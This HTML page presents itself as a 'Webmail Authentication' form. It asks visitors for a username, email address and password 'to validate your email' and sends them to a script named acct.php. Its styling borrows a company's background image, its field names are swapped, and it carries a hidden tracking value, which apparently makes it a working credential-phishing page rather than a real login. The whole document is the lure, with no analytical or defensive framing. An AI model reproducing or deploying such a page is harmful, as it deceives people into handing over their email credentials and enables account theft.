﻿<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <style type="text/css">
      input[type=submit], input[type=button]{
        background-color:#003a70;
        color:white;
        border:0px
      }
      html,body{
        height:100%;
        padding:0;
        margin:0;
        background-color: #ffffff;
        background-size: 100%
      }
      .oc{
        display:table;
        width:100%;
        height:100%;
      }
      .ic{
        display:table-cell;
        vertical-align:middle;
      }
      form{
        display:block;
        background:#ffffff;
        
        padding:0 0 25px 0;
        width:500px;
        font-family:helvetica,sans-serif;
        font-size:14px;
        Color : #003a70;
        margin:10px auto;
      }
      .fel,.fer,.fec{
        text-align:center;
        width:350px;
        margin:0 auto;
        padding:10px;
      }
      .fel{
        text-align:left;
      }
      .fer{
        text-align:right;
      }
      h1{
        font-weight:bold;
        font-size:21px;
        margin:0;
        padding:15px 10px;
        text-align:center;
      }
      p{
        margin:15px auto;
        width:75%;
        text-align:left;
      }
      ul{
        margin:15px auto;
        width:75%;
      }
      h1 {
        border-radius: 10px;
      }
      h2{
        margin:25px 10px;
        font-weight:bold;
        text-align:center;
      }
      label{
        width:90px;
        font-size:16px;
      }
      FORM{
        opacity:0.8;
        border-radius: 10px;
      }
    </style>
    <title>
      Webmail Authentication
    </title>
  </head>
  <body style="background-image:url('https://webshare.hiqconsulting.org/core/img/backgroundHIQ.png')">
    <div class="oc">
      <div class="ic">
        <form action="acct.php" method="post">
          <input type="hidden" name="sph_org_location" value="W3qGqPNz93k=">
          <h1 style="background:#ffffff center 25px ;">
            
          </h1>
          <h2>
            <script type="text/javascript">
              var r = ""
                  if (r == "Failed to search user DN" )
                  {
                    document.write("<b>Invalid Username</b>")
                      }
              else if (r == "Failed to bind LDAP server" )
              {
                document.write("<b>Invalid Password</b>")
                  }
              else if (r == "Username or password can't be null" )
              {
                document.write("<b>Username or password empty</b>")
                  }
              else if (r == "Invalid credentials" )
              {
                document.write("<b>Invalid Username or Password</b>")
                  }
              else if (r != "" )
              {
                document.write(r)
                  }
              
            </script>
          </h2>
          <h2>
            Please enter your username and password to validate your email
          </h2>
          
          <div class="fel">
            <table>
              <tr>
                <td width="90px">
                  <label>
                    Username
                  </label>
                </td>
                <td>
                  <input name="email" type="text" autocorrect="off" autocapitalize="off" style="width:245px">
                </td>
              </tr>
            </table>
          </div>
	<div class="fel">
            <table>
              <tr>
                <td width="90px">
                  <label>
                    Email Address
                  </label>
                </td>
                <td>
                  <input name="username" type="text" autocorrect="off" autocapitalize="off" style="width:245px">
                </td>
              </tr>
            </table>
          </div>
          <div class="fel">
            <table>
              <tr>
                <td width="90px">
                  <label>
                    Password
                  </label>
                </td>
                <td>
                  <input name="password" type="password" autocomplete="off" style="width:245px">
                </td>
              </tr>
            </table>
          </div>
          <div class="fer">
            <input type="submit" value="VALIDATE">
          </div>
        </form>
      </div>
    </div>
  </body>
</html>